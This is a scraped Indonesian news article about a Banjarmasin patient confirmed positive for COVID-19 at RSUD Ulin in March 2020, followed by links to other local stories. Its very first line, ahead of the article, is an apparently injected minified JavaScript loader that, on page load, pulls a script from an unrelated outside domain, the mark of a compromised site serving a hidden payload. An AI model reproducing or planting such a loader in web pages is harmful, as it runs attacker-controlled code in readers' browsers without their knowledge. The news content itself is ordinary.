(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Seminggu Diisolasi di RSUD Ulin, Pasien Ulin-1 Asal Banjarmasin Baru Dinyatakan Positif


KANALKALIMANTAN.COM, BANJARMASIN, Tim Gugus Tugas pencegahan, pengendalian, dan penaganan virus corona (Covid-19) Kalimantan Selatan, menyatakan 1 pasien dalam pengawasan (PDP) yang diisolasi di RSUD Ulin dinyatakan positif corona.

“Kita sampaikan, pasien Ulin 01 merupakan warga kota Banjarmasin. Pasien berusia 40 tahun,” katanya saat konfrensi pers, Minggu (22/3/2020) siang.

Sebelum dinyatakan posistif, tercatat sudah 1 minggu ini pasien Ulin-01 dirawat di ruang isolasiRSUD Ulin Banjarmasin. Ia datang pada hari yang sama sengan dua pasien PDP lain asal Tanah Bumbu yang sebelumnya dirawat di lokasi yang sama, pada Sabtu (14/3/2020). Informasi didapat, diduga, ketiganya suspect corona atau COVID-19 usai pulang dari luar Kalsel, di mana dua di antaranya pulang dari ibadah umroh. Sedangkan satu lagi usai bepergian dari kota di Pulau Jawa yang terkena virus corona.

Direktur RSUD Ulin Banjarmasin Hj Suciati dalam keterangan sebelumnya mengatakan, pasien Ulin 01 merupakan rujukan dari Rumah Sakit Suaka Insan Banjarmasin.

Terkait jeda waktu seminggu sebelum mendapatkan hasil uji sampel, Dinas Kesahatan (Dinkes) Kalsel M Muslim mengatakan, jika pada normalnya hasil sample akan keluar 4 hari setelah dikirim. Akan tetapi, lantaran yang diperiksa oleh Litbang Kesehatan mencapai ribuan sample maka diperlukan waktu lebih lama hingga hasilnya keluar.

Maka dalam upaya mempercepat, Pemerintah Pusat akhirnya menyetujui bahwa Balai Besar Teknik Kesehatan Lingkungan dan Pengendalian Penyakit (BBTKLPP) Banjarbaru akan menjadi laboratorium pemeriksa sampel atau spesimen virus corona atau Covid-19.

Hal ini, diungkapkan Gubernur Kalimantan Selatan Sahbirin Noor usai memimpin rapat koordinasi penanganan virus Corona di Gedung Idham Chalid, Banjarbaru, Jum’at (20/3/2020) sore. Dijelaskannya, rekomendasi pemerintah itu berdasarkan Keputusan Menteri Kesehatan Nomor HK.01.07./MENKES/124/2020.

Telah keluar SK dari Kemenkes dengan ditunjuknya Balai Besar Teknik Kesehatan Lingkungan dan Pengendalian Penyakit Banjarbaru tentang jajaring laboratorium pemeriksaan corona virus. Ini merupakan kabar baik bagi kita,” ucapnya.

Terkait keputusan yang dikeluarkan oleh pemerintah pusat tersebut, Paman Birin -sapaan akrab Gubernur- mengucapkan terima kasih kepada seluruh pihak atas upaya nyata dalam melakukan pencegahan virus corona. Termasuk upaya uji sampel Covid- -19. (kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : Chell


Desy Arfianty

Recent Posts

Begini Penjelasan Disporabudpar Banjarbaru Soal Perizinan Hotel Aeris

KANALKALIMANTAN.COM, BANJARBARU – Sebuah hotel baru di ruas Jalan Panglima Batur Banjarbaru akan melakukan soft… Read More

4 jam ago

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

5 jam ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

5 jam ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

6 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

6 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

7 jam ago

This website uses cookies.